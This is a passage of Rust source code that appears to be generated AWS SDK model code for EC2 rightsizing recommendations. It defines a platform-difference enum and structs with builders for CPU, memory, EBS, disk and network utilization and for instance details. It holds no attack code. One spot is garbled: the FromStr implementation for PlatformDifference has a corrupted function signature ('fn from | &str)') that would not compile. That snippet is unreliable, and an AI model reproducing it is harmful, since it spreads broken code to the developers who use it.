    pub fn builder() -> crate::model::target_instance::Builder {
        std::default::Default::default()
    }
}
/// Platform differences between the current and recommended instance type, as
/// reported by the rightsizing recommendation API.
#[non_exhaustive]
#[derive(
    std::clone::Clone,
    std::cmp::Eq,
    std::cmp::Ord,
    std::cmp::PartialEq,
    std::cmp::PartialOrd,
    std::fmt::Debug,
    std::hash::Hash,
)]
pub enum PlatformDifference {
    Hypervisor,
    InstanceStoreAvailability,
    NetworkInterface,
    StorageInterface,
    VirtualizationType,
    /// Unknown contains new variants that have been added since this code was generated.
    Unknown(String),
}
impl std::convert::From<&str> for PlatformDifference {
    // Maps the raw service string to the matching variant; unrecognized values
    // are preserved in `Unknown` for forward compatibility.
    fn from(s: &str) -> Self {
        match s {
            "HYPERVISOR" => PlatformDifference::Hypervisor,
            "INSTANCE_STORE_AVAILABILITY" => PlatformDifference::InstanceStoreAvailability,
            "NETWORK_INTERFACE" => PlatformDifference::NetworkInterface,
            "STORAGE_INTERFACE" => PlatformDifference::StorageInterface,
            "VIRTUALIZATION_TYPE" => PlatformDifference::VirtualizationType,
            other => PlatformDifference::Unknown(other.to_owned()),
        }
    }
}
impl std::str::FromStr for PlatformDifference {
type Err = std::convert::Infallible;
fn from | &str) -> std::result::Result<Self, Self::Err> {
Ok(PlatformDifference::from(s))
}
}
impl PlatformDifference {
    /// Returns the raw API string for this variant (the `Unknown` payload is returned as-is).
    pub fn as_str(&self) -> &str {
        match self {
            PlatformDifference::Hypervisor => "HYPERVISOR",
            PlatformDifference::InstanceStoreAvailability => "INSTANCE_STORE_AVAILABILITY",
            PlatformDifference::NetworkInterface => "NETWORK_INTERFACE",
            PlatformDifference::StorageInterface => "STORAGE_INTERFACE",
            PlatformDifference::VirtualizationType => "VIRTUALIZATION_TYPE",
            PlatformDifference::Unknown(s) => s.as_ref(),
        }
    }
    /// Returns all known values (excluding `Unknown`) as their raw API strings.
    pub fn values() -> &'static [&'static str] {
        &[
            "HYPERVISOR",
            "INSTANCE_STORE_AVAILABILITY",
            "NETWORK_INTERFACE",
            "STORAGE_INTERFACE",
            "VIRTUALIZATION_TYPE",
        ]
    }
}
impl AsRef<str> for PlatformDifference {
    // Delegates to `as_str` so the enum can be used anywhere a `&str` is accepted.
    fn as_ref(&self) -> &str {
        self.as_str()
    }
}
/// <p>Resource utilization of current resource. </p>
// Currently wraps only EC2 utilization; construct via `Self::builder()`.
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ResourceUtilization {
    /// <p>The utilization of current Amazon EC2 instance. </p>
    pub ec2_resource_utilization: std::option::Option<crate::model::Ec2ResourceUtilization>,
}
impl std::fmt::Debug for ResourceUtilization {
    /// Renders the struct with one entry per field.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("ResourceUtilization")
            .field("ec2_resource_utilization", &self.ec2_resource_utilization)
            .finish()
    }
}
/// See [`ResourceUtilization`](crate::model::ResourceUtilization)
pub mod resource_utilization {
    /// A builder for [`ResourceUtilization`](crate::model::ResourceUtilization)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) ec2_resource_utilization:
            std::option::Option<crate::model::Ec2ResourceUtilization>,
    }
    impl Builder {
        /// <p>The utilization of current Amazon EC2 instance. </p>
        pub fn ec2_resource_utilization(
            mut self,
            input: crate::model::Ec2ResourceUtilization,
        ) -> Self {
            self.ec2_resource_utilization = Some(input);
            self
        }
        /// Sets `ec2_resource_utilization`, replacing any previously stored value.
        pub fn set_ec2_resource_utilization(
            mut self,
            input: std::option::Option<crate::model::Ec2ResourceUtilization>,
        ) -> Self {
            self.ec2_resource_utilization = input;
            self
        }
        /// Consumes the builder and constructs a [`ResourceUtilization`](crate::model::ResourceUtilization)
        pub fn build(self) -> crate::model::ResourceUtilization {
            crate::model::ResourceUtilization {
                ec2_resource_utilization: self.ec2_resource_utilization,
            }
        }
    }
}
impl ResourceUtilization {
    /// Returns a fresh, all-`None` [`Builder`](crate::model::resource_utilization::Builder)
    /// for assembling a [`ResourceUtilization`](crate::model::ResourceUtilization).
    pub fn builder() -> crate::model::resource_utilization::Builder {
        std::default::Default::default()
    }
}
/// <p>Utilization metrics of the instance. </p>
// Optional fields are `None` when the service omits them; construct via `Self::builder()`.
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct Ec2ResourceUtilization {
    /// <p> The maximum observed or expected CPU utilization of the instance.</p>
    pub max_cpu_utilization_percentage: std::option::Option<std::string::String>,
    /// <p> The maximum observed or expected memory utilization of the instance.</p>
    pub max_memory_utilization_percentage: std::option::Option<std::string::String>,
    /// <p> The maximum observed or expected storage utilization of the instance. This doesn't
    /// include EBS storage.</p>
    pub max_storage_utilization_percentage: std::option::Option<std::string::String>,
    /// <p>The EBS field that contains a list of EBS metrics that are associated with the current
    /// instance. </p>
    pub ebs_resource_utilization: std::option::Option<crate::model::EbsResourceUtilization>,
    /// <p> The field that contains a list of disk (local storage) metrics that are associated
    /// with the current instance. </p>
    pub disk_resource_utilization: std::option::Option<crate::model::DiskResourceUtilization>,
    /// <p> The network field that contains a list of network metrics that are associated with
    /// the current instance. </p>
    pub network_resource_utilization: std::option::Option<crate::model::NetworkResourceUtilization>,
}
impl std::fmt::Debug for Ec2ResourceUtilization {
    /// Renders the struct with one entry per field.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("Ec2ResourceUtilization")
            .field(
                "max_cpu_utilization_percentage",
                &self.max_cpu_utilization_percentage,
            )
            .field(
                "max_memory_utilization_percentage",
                &self.max_memory_utilization_percentage,
            )
            .field(
                "max_storage_utilization_percentage",
                &self.max_storage_utilization_percentage,
            )
            .field("ebs_resource_utilization", &self.ebs_resource_utilization)
            .field("disk_resource_utilization", &self.disk_resource_utilization)
            .field(
                "network_resource_utilization",
                &self.network_resource_utilization,
            )
            .finish()
    }
}
/// See [`Ec2ResourceUtilization`](crate::model::Ec2ResourceUtilization)
pub mod ec2_resource_utilization {
    /// A builder for [`Ec2ResourceUtilization`](crate::model::Ec2ResourceUtilization)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) max_cpu_utilization_percentage: std::option::Option<std::string::String>,
        pub(crate) max_memory_utilization_percentage: std::option::Option<std::string::String>,
        pub(crate) max_storage_utilization_percentage: std::option::Option<std::string::String>,
        pub(crate) ebs_resource_utilization:
            std::option::Option<crate::model::EbsResourceUtilization>,
        pub(crate) disk_resource_utilization:
            std::option::Option<crate::model::DiskResourceUtilization>,
        pub(crate) network_resource_utilization:
            std::option::Option<crate::model::NetworkResourceUtilization>,
    }
    impl Builder {
        /// <p> The maximum observed or expected CPU utilization of the instance.</p>
        pub fn max_cpu_utilization_percentage(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.max_cpu_utilization_percentage = Some(input.into());
            self
        }
        /// Sets `max_cpu_utilization_percentage`, replacing any previously stored value.
        pub fn set_max_cpu_utilization_percentage(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.max_cpu_utilization_percentage = input;
            self
        }
        /// <p> The maximum observed or expected memory utilization of the instance.</p>
        pub fn max_memory_utilization_percentage(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.max_memory_utilization_percentage = Some(input.into());
            self
        }
        /// Sets `max_memory_utilization_percentage`, replacing any previously stored value.
        pub fn set_max_memory_utilization_percentage(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.max_memory_utilization_percentage = input;
            self
        }
        /// <p> The maximum observed or expected storage utilization of the instance. This doesn't
        /// include EBS storage.</p>
        pub fn max_storage_utilization_percentage(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.max_storage_utilization_percentage = Some(input.into());
            self
        }
        /// Sets `max_storage_utilization_percentage`, replacing any previously stored value.
        pub fn set_max_storage_utilization_percentage(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.max_storage_utilization_percentage = input;
            self
        }
        /// <p>The EBS field that contains a list of EBS metrics that are associated with the current
        /// instance. </p>
        pub fn ebs_resource_utilization(
            mut self,
            input: crate::model::EbsResourceUtilization,
        ) -> Self {
            self.ebs_resource_utilization = Some(input);
            self
        }
        /// Sets `ebs_resource_utilization`, replacing any previously stored value.
        pub fn set_ebs_resource_utilization(
            mut self,
            input: std::option::Option<crate::model::EbsResourceUtilization>,
        ) -> Self {
            self.ebs_resource_utilization = input;
            self
        }
        /// <p> The field that contains a list of disk (local storage) metrics that are associated
        /// with the current instance. </p>
        pub fn disk_resource_utilization(
            mut self,
            input: crate::model::DiskResourceUtilization,
        ) -> Self {
            self.disk_resource_utilization = Some(input);
            self
        }
        /// Sets `disk_resource_utilization`, replacing any previously stored value.
        pub fn set_disk_resource_utilization(
            mut self,
            input: std::option::Option<crate::model::DiskResourceUtilization>,
        ) -> Self {
            self.disk_resource_utilization = input;
            self
        }
        /// <p> The network field that contains a list of network metrics that are associated with
        /// the current instance. </p>
        pub fn network_resource_utilization(
            mut self,
            input: crate::model::NetworkResourceUtilization,
        ) -> Self {
            self.network_resource_utilization = Some(input);
            self
        }
        /// Sets `network_resource_utilization`, replacing any previously stored value.
        pub fn set_network_resource_utilization(
            mut self,
            input: std::option::Option<crate::model::NetworkResourceUtilization>,
        ) -> Self {
            self.network_resource_utilization = input;
            self
        }
        /// Consumes the builder and constructs a [`Ec2ResourceUtilization`](crate::model::Ec2ResourceUtilization)
        pub fn build(self) -> crate::model::Ec2ResourceUtilization {
            crate::model::Ec2ResourceUtilization {
                max_cpu_utilization_percentage: self.max_cpu_utilization_percentage,
                max_memory_utilization_percentage: self.max_memory_utilization_percentage,
                max_storage_utilization_percentage: self.max_storage_utilization_percentage,
                ebs_resource_utilization: self.ebs_resource_utilization,
                disk_resource_utilization: self.disk_resource_utilization,
                network_resource_utilization: self.network_resource_utilization,
            }
        }
    }
}
impl Ec2ResourceUtilization {
    /// Returns a fresh, all-`None` [`Builder`](crate::model::ec2_resource_utilization::Builder)
    /// for assembling an [`Ec2ResourceUtilization`](crate::model::Ec2ResourceUtilization).
    pub fn builder() -> crate::model::ec2_resource_utilization::Builder {
        std::default::Default::default()
    }
}
/// <p> The network field that contains a list of network metrics that are associated with
/// the current instance. </p>
// Optional fields are `None` when the service omits them; construct via `Self::builder()`.
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct NetworkResourceUtilization {
    /// <p> The network inbound throughput utilization measured in Bytes per second. </p>
    pub network_in_bytes_per_second: std::option::Option<std::string::String>,
    /// <p> The network outbound throughput utilization measured in Bytes per second. </p>
    pub network_out_bytes_per_second: std::option::Option<std::string::String>,
    /// <p> The network ingress packets that are measured in packets per second. </p>
    pub network_packets_in_per_second: std::option::Option<std::string::String>,
    /// <p> The network egress packets that are measured in packets per second. </p>
    pub network_packets_out_per_second: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for NetworkResourceUtilization {
    /// Renders the struct with one entry per field.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("NetworkResourceUtilization")
            .field(
                "network_in_bytes_per_second",
                &self.network_in_bytes_per_second,
            )
            .field(
                "network_out_bytes_per_second",
                &self.network_out_bytes_per_second,
            )
            .field(
                "network_packets_in_per_second",
                &self.network_packets_in_per_second,
            )
            .field(
                "network_packets_out_per_second",
                &self.network_packets_out_per_second,
            )
            .finish()
    }
}
/// See [`NetworkResourceUtilization`](crate::model::NetworkResourceUtilization)
pub mod network_resource_utilization {
    /// A builder for [`NetworkResourceUtilization`](crate::model::NetworkResourceUtilization)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) network_in_bytes_per_second: std::option::Option<std::string::String>,
        pub(crate) network_out_bytes_per_second: std::option::Option<std::string::String>,
        pub(crate) network_packets_in_per_second: std::option::Option<std::string::String>,
        pub(crate) network_packets_out_per_second: std::option::Option<std::string::String>,
    }
    impl Builder {
        /// <p> The network inbound throughput utilization measured in Bytes per second. </p>
        pub fn network_in_bytes_per_second(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.network_in_bytes_per_second = Some(input.into());
            self
        }
        /// Sets `network_in_bytes_per_second`, replacing any previously stored value.
        pub fn set_network_in_bytes_per_second(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.network_in_bytes_per_second = input;
            self
        }
        /// <p> The network outbound throughput utilization measured in Bytes per second. </p>
        pub fn network_out_bytes_per_second(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.network_out_bytes_per_second = Some(input.into());
            self
        }
        /// Sets `network_out_bytes_per_second`, replacing any previously stored value.
        pub fn set_network_out_bytes_per_second(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.network_out_bytes_per_second = input;
            self
        }
        /// <p> The network ingress packets that are measured in packets per second. </p>
        pub fn network_packets_in_per_second(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.network_packets_in_per_second = Some(input.into());
            self
        }
        /// Sets `network_packets_in_per_second`, replacing any previously stored value.
        pub fn set_network_packets_in_per_second(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.network_packets_in_per_second = input;
            self
        }
        /// <p> The network egress packets that are measured in packets per second. </p>
        pub fn network_packets_out_per_second(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.network_packets_out_per_second = Some(input.into());
            self
        }
        /// Sets `network_packets_out_per_second`, replacing any previously stored value.
        pub fn set_network_packets_out_per_second(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.network_packets_out_per_second = input;
            self
        }
        /// Consumes the builder and constructs a [`NetworkResourceUtilization`](crate::model::NetworkResourceUtilization)
        pub fn build(self) -> crate::model::NetworkResourceUtilization {
            crate::model::NetworkResourceUtilization {
                network_in_bytes_per_second: self.network_in_bytes_per_second,
                network_out_bytes_per_second: self.network_out_bytes_per_second,
                network_packets_in_per_second: self.network_packets_in_per_second,
                network_packets_out_per_second: self.network_packets_out_per_second,
            }
        }
    }
}
impl NetworkResourceUtilization {
    /// Returns a fresh, all-`None` [`Builder`](crate::model::network_resource_utilization::Builder)
    /// for assembling a [`NetworkResourceUtilization`](crate::model::NetworkResourceUtilization).
    pub fn builder() -> crate::model::network_resource_utilization::Builder {
        std::default::Default::default()
    }
}
/// <p> The field that contains a list of disk (local storage) metrics that are associated
/// with the current instance. </p>
// Optional fields are `None` when the service omits them; construct via `Self::builder()`.
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct DiskResourceUtilization {
    /// <p> The maximum number of read operations per second. </p>
    pub disk_read_ops_per_second: std::option::Option<std::string::String>,
    /// <p> The maximum number of write operations per second. </p>
    pub disk_write_ops_per_second: std::option::Option<std::string::String>,
    /// <p> The maximum read throughput operations per second. </p>
    pub disk_read_bytes_per_second: std::option::Option<std::string::String>,
    /// <p> The maximum write throughput operations per second. </p>
    pub disk_write_bytes_per_second: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for DiskResourceUtilization {
    /// Renders the struct with one entry per field.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("DiskResourceUtilization")
            .field("disk_read_ops_per_second", &self.disk_read_ops_per_second)
            .field("disk_write_ops_per_second", &self.disk_write_ops_per_second)
            .field(
                "disk_read_bytes_per_second",
                &self.disk_read_bytes_per_second,
            )
            .field(
                "disk_write_bytes_per_second",
                &self.disk_write_bytes_per_second,
            )
            .finish()
    }
}
/// See [`DiskResourceUtilization`](crate::model::DiskResourceUtilization)
pub mod disk_resource_utilization {
    /// A builder for [`DiskResourceUtilization`](crate::model::DiskResourceUtilization)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) disk_read_ops_per_second: std::option::Option<std::string::String>,
        pub(crate) disk_write_ops_per_second: std::option::Option<std::string::String>,
        pub(crate) disk_read_bytes_per_second: std::option::Option<std::string::String>,
        pub(crate) disk_write_bytes_per_second: std::option::Option<std::string::String>,
    }
    impl Builder {
        /// <p> The maximum number of read operations per second. </p>
        pub fn disk_read_ops_per_second(mut self, input: impl Into<std::string::String>) -> Self {
            self.disk_read_ops_per_second = Some(input.into());
            self
        }
        /// Sets `disk_read_ops_per_second`, replacing any previously stored value.
        pub fn set_disk_read_ops_per_second(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.disk_read_ops_per_second = input;
            self
        }
        /// <p> The maximum number of write operations per second. </p>
        pub fn disk_write_ops_per_second(mut self, input: impl Into<std::string::String>) -> Self {
            self.disk_write_ops_per_second = Some(input.into());
            self
        }
        /// Sets `disk_write_ops_per_second`, replacing any previously stored value.
        pub fn set_disk_write_ops_per_second(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.disk_write_ops_per_second = input;
            self
        }
        /// <p> The maximum read throughput operations per second. </p>
        pub fn disk_read_bytes_per_second(mut self, input: impl Into<std::string::String>) -> Self {
            self.disk_read_bytes_per_second = Some(input.into());
            self
        }
        /// Sets `disk_read_bytes_per_second`, replacing any previously stored value.
        pub fn set_disk_read_bytes_per_second(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.disk_read_bytes_per_second = input;
            self
        }
        /// <p> The maximum write throughput operations per second. </p>
        pub fn disk_write_bytes_per_second(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.disk_write_bytes_per_second = Some(input.into());
            self
        }
        /// Sets `disk_write_bytes_per_second`, replacing any previously stored value.
        pub fn set_disk_write_bytes_per_second(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.disk_write_bytes_per_second = input;
            self
        }
        /// Consumes the builder and constructs a [`DiskResourceUtilization`](crate::model::DiskResourceUtilization)
        pub fn build(self) -> crate::model::DiskResourceUtilization {
            crate::model::DiskResourceUtilization {
                disk_read_ops_per_second: self.disk_read_ops_per_second,
                disk_write_ops_per_second: self.disk_write_ops_per_second,
                disk_read_bytes_per_second: self.disk_read_bytes_per_second,
                disk_write_bytes_per_second: self.disk_write_bytes_per_second,
            }
        }
    }
}
impl DiskResourceUtilization {
    /// Returns a fresh, all-`None` [`Builder`](crate::model::disk_resource_utilization::Builder)
    /// for assembling a [`DiskResourceUtilization`](crate::model::DiskResourceUtilization).
    pub fn builder() -> crate::model::disk_resource_utilization::Builder {
        std::default::Default::default()
    }
}
/// <p>The EBS field that contains a list of EBS metrics that are associated with the current
/// instance. </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct EbsResourceUtilization {
    /// <p>The maximum number of read operations per second. </p>
    pub ebs_read_ops_per_second: std::option::Option<std::string::String>,
    /// <p>The maximum number of write operations per second. </p>
    pub ebs_write_ops_per_second: std::option::Option<std::string::String>,
    /// <p>The maximum size of read operations per second </p>
    pub ebs_read_bytes_per_second: std::option::Option<std::string::String>,
    /// <p>The maximum size of write operations per second. </p>
    pub ebs_write_bytes_per_second: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for EbsResourceUtilization {
    // Renders all four metric fields through the standard `debug_struct` helper.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("EbsResourceUtilization")
            .field("ebs_read_ops_per_second", &self.ebs_read_ops_per_second)
            .field("ebs_write_ops_per_second", &self.ebs_write_ops_per_second)
            .field("ebs_read_bytes_per_second", &self.ebs_read_bytes_per_second)
            .field("ebs_write_bytes_per_second", &self.ebs_write_bytes_per_second)
            .finish()
    }
}
/// See [`EbsResourceUtilization`](crate::model::EbsResourceUtilization)
pub mod ebs_resource_utilization {
    /// A builder for [`EbsResourceUtilization`](crate::model::EbsResourceUtilization)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) ebs_read_ops_per_second: std::option::Option<std::string::String>,
        pub(crate) ebs_write_ops_per_second: std::option::Option<std::string::String>,
        pub(crate) ebs_read_bytes_per_second: std::option::Option<std::string::String>,
        pub(crate) ebs_write_bytes_per_second: std::option::Option<std::string::String>,
    }
    impl Builder {
        /// <p>The maximum number of read operations per second. </p>
        pub fn ebs_read_ops_per_second(self, value: impl Into<std::string::String>) -> Self {
            Self {
                ebs_read_ops_per_second: Some(value.into()),
                ..self
            }
        }
        /// Overwrites `ebs_read_ops_per_second` with a raw optional value; `None` clears it.
        pub fn set_ebs_read_ops_per_second(
            self,
            value: std::option::Option<std::string::String>,
        ) -> Self {
            Self {
                ebs_read_ops_per_second: value,
                ..self
            }
        }
        /// <p>The maximum number of write operations per second. </p>
        pub fn ebs_write_ops_per_second(self, value: impl Into<std::string::String>) -> Self {
            Self {
                ebs_write_ops_per_second: Some(value.into()),
                ..self
            }
        }
        /// Overwrites `ebs_write_ops_per_second` with a raw optional value; `None` clears it.
        pub fn set_ebs_write_ops_per_second(
            self,
            value: std::option::Option<std::string::String>,
        ) -> Self {
            Self {
                ebs_write_ops_per_second: value,
                ..self
            }
        }
        /// <p>The maximum size of read operations per second </p>
        pub fn ebs_read_bytes_per_second(self, value: impl Into<std::string::String>) -> Self {
            Self {
                ebs_read_bytes_per_second: Some(value.into()),
                ..self
            }
        }
        /// Overwrites `ebs_read_bytes_per_second` with a raw optional value; `None` clears it.
        pub fn set_ebs_read_bytes_per_second(
            self,
            value: std::option::Option<std::string::String>,
        ) -> Self {
            Self {
                ebs_read_bytes_per_second: value,
                ..self
            }
        }
        /// <p>The maximum size of write operations per second. </p>
        pub fn ebs_write_bytes_per_second(self, value: impl Into<std::string::String>) -> Self {
            Self {
                ebs_write_bytes_per_second: Some(value.into()),
                ..self
            }
        }
        /// Overwrites `ebs_write_bytes_per_second` with a raw optional value; `None` clears it.
        pub fn set_ebs_write_bytes_per_second(
            self,
            value: std::option::Option<std::string::String>,
        ) -> Self {
            Self {
                ebs_write_bytes_per_second: value,
                ..self
            }
        }
        /// Consumes the builder and constructs a [`EbsResourceUtilization`](crate::model::EbsResourceUtilization)
        pub fn build(self) -> crate::model::EbsResourceUtilization {
            // Destructure once so every field is moved, not cloned.
            let Self {
                ebs_read_ops_per_second,
                ebs_write_ops_per_second,
                ebs_read_bytes_per_second,
                ebs_write_bytes_per_second,
            } = self;
            crate::model::EbsResourceUtilization {
                ebs_read_ops_per_second,
                ebs_write_ops_per_second,
                ebs_read_bytes_per_second,
                ebs_write_bytes_per_second,
            }
        }
    }
}
impl EbsResourceUtilization {
    /// Creates a new builder-style object to manufacture [`EbsResourceUtilization`](crate::model::EbsResourceUtilization)
    pub fn builder() -> crate::model::ebs_resource_utilization::Builder {
        // `Builder` derives `Default`, so the zero-value builder is the start state.
        Default::default()
    }
}
/// <p>Details on the resource.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ResourceDetails {
    /// <p>Details on the Amazon EC2 resource.</p>
    pub ec2_resource_details: std::option::Option<crate::model::Ec2ResourceDetails>,
}
impl std::fmt::Debug for ResourceDetails {
    // Renders the single EC2-details field through the standard `debug_struct` helper.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("ResourceDetails")
            .field("ec2_resource_details", &self.ec2_resource_details)
            .finish()
    }
}
/// See [`ResourceDetails`](crate::model::ResourceDetails)
pub mod resource_details {
    /// A builder for [`ResourceDetails`](crate::model::ResourceDetails)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) ec2_resource_details: std::option::Option<crate::model::Ec2ResourceDetails>,
    }
    impl Builder {
        /// <p>Details on the Amazon EC2 resource.</p>
        pub fn ec2_resource_details(self, value: crate::model::Ec2ResourceDetails) -> Self {
            Self {
                ec2_resource_details: Some(value),
            }
        }
        /// Overwrites `ec2_resource_details` with a raw optional value; `None` clears it.
        pub fn set_ec2_resource_details(
            self,
            value: std::option::Option<crate::model::Ec2ResourceDetails>,
        ) -> Self {
            Self {
                ec2_resource_details: value,
            }
        }
        /// Consumes the builder and constructs a [`ResourceDetails`](crate::model::ResourceDetails)
        pub fn build(self) -> crate::model::ResourceDetails {
            crate::model::ResourceDetails {
                ec2_resource_details: self.ec2_resource_details,
            }
        }
    }
}
impl ResourceDetails {
    /// Creates a new builder-style object to manufacture [`ResourceDetails`](crate::model::ResourceDetails)
    pub fn builder() -> crate::model::resource_details::Builder {
        // `Builder` derives `Default`, so the zero-value builder is the start state.
        Default::default()
    }
}
/// <p>Details on the Amazon EC2 Resource.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct Ec2ResourceDetails {
    /// <p>The hourly public On-Demand rate for the instance type.</p>
    pub hourly_on_demand_rate: std::option::Option<std::string::String>,
    /// <p>The type of Amazon Web Services instance.</p>
    pub instance_type: std::option::Option<std::string::String>,
    /// <p>The platform of the Amazon Web Services instance. The platform is the specific
    /// combination of operating system, license model, and software on an instance.</p>
    pub platform: std::option::Option<std::string::String>,
    /// <p>The Amazon Web Services Region of the instance.</p>
    pub region: std::option::Option<std::string::String>,
    /// <p>The SKU of the product.</p>
    pub sku: std::option::Option<std::string::String>,
    /// <p>The memory capacity of the Amazon Web Services instance.</p>
    pub memory: std::option::Option<std::string::String>,
    /// <p>The network performance capacity of the Amazon Web Services instance.</p>
    pub network_performance: std::option::Option<std::string::String>,
    /// <p>The disk storage of the Amazon Web Services instance. This doesn't include EBS
    /// storage.</p>
    pub storage: std::option::Option<std::string::String>,
    /// <p> The number of VCPU cores in the Amazon Web Services instance type.</p>
    pub vcpu: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for Ec2ResourceDetails {
    // Renders every detail field through the standard `debug_struct` helper.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("Ec2ResourceDetails")
            .field("hourly_on_demand_rate", &self.hourly_on_demand_rate)
            .field("instance_type", &self.instance_type)
            .field("platform", &self.platform)
            .field("region", &self.region)
            .field("sku", &self.sku)
            .field("memory", &self.memory)
            .field("network_performance", &self.network_performance)
            .field("storage", &self.storage)
            .field("vcpu", &self.vcpu)
            .finish()
    }
}
/// See [`Ec2ResourceDetails`](crate::model::Ec2ResourceDetails)
pub mod ec2_resource_details {
    /// A builder for [`Ec2ResourceDetails`](crate::model::Ec2ResourceDetails)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) hourly_on_demand_rate: std::option::Option<std::string::String>,
        pub(crate) instance_type: std::option::Option<std::string::String>,
        pub(crate) platform: std::option::Option<std::string::String>,
        pub(crate) region: std::option::Option<std::string::String>,
        pub(crate) sku: std::option::Option<std::string::String>,
        pub(crate) memory: std::option::Option<std::string::String>,
        pub(crate) network_performance: std::option::Option<std::string::String>,
        pub(crate) storage: std::option::Option<std::string::String>,
        pub(crate) vcpu: std::option::Option<std::string::String>,
    }
    impl Builder {
        /// <p>The hourly public On-Demand rate for the instance type.</p>
        pub fn hourly_on_demand_rate(self, value: impl Into<std::string::String>) -> Self {
            Self {
                hourly_on_demand_rate: Some(value.into()),
                ..self
            }
        }
        /// Overwrites `hourly_on_demand_rate` with a raw optional value; `None` clears it.
        pub fn set_hourly_on_demand_rate(
            self,
            value: std::option::Option<std::string::String>,
        ) -> Self {
            Self {
                hourly_on_demand_rate: value,
                ..self
            }
        }
        /// <p>The type of Amazon Web Services instance.</p>
        pub fn instance_type(self, value: impl Into<std::string::String>) -> Self {
            Self {
                instance_type: Some(value.into()),
                ..self
            }
        }
        /// Overwrites `instance_type` with a raw optional value; `None` clears it.
        pub fn set_instance_type(self, value: std::option::Option<std::string::String>) -> Self {
            Self {
                instance_type: value,
                ..self
            }
        }
        /// <p>The platform of the Amazon Web Services instance. The platform is the specific
        /// combination of operating system, license model, and software on an instance.</p>
        pub fn platform(self, value: impl Into<std::string::String>) -> Self {
            Self {
                platform: Some(value.into()),
                ..self
            }
        }
        /// Overwrites `platform` with a raw optional value; `None` clears it.
        pub fn set_platform(self, value: std::option::Option<std::string::String>) -> Self {
            Self {
                platform: value,
                ..self
            }
        }
        /// <p>The Amazon Web Services Region of the instance.</p>
        pub fn region(self, value: impl Into<std::string::String>) -> Self {
            Self {
                region: Some(value.into()),
                ..self
            }
        }
        /// Overwrites `region` with a raw optional value; `None` clears it.
        pub fn set_region(self, value: std::option::Option<std::string::String>) -> Self {
            Self {
                region: value,
                ..self
            }
        }
        /// <p>The SKU of the product.</p>
        pub fn sku(self, value: impl Into<std::string::String>) -> Self {
            Self {
                sku: Some(value.into()),
                ..self
            }
        }
        /// Overwrites `sku` with a raw optional value; `None` clears it.
        pub fn set_sku(self, value: std::option::Option<std::string::String>) -> Self {
            Self { sku: value, ..self }
        }
        /// <p>The memory capacity of the Amazon Web Services instance.</p>
        pub fn memory(self, value: impl Into<std::string::String>) -> Self {
            Self {
                memory: Some(value.into()),
                ..self
            }
        }
        /// Overwrites `memory` with a raw optional value; `None` clears it.
        pub fn set_memory(self, value: std::option::Option<std::string::String>) -> Self {
            Self {
                memory: value,
                ..self
            }
        }
        /// <p>The network performance capacity of the Amazon Web Services instance.</p>
        pub fn network_performance(self, value: impl Into<std::string::String>) -> Self {
            Self {
                network_performance: Some(value.into()),
                ..self
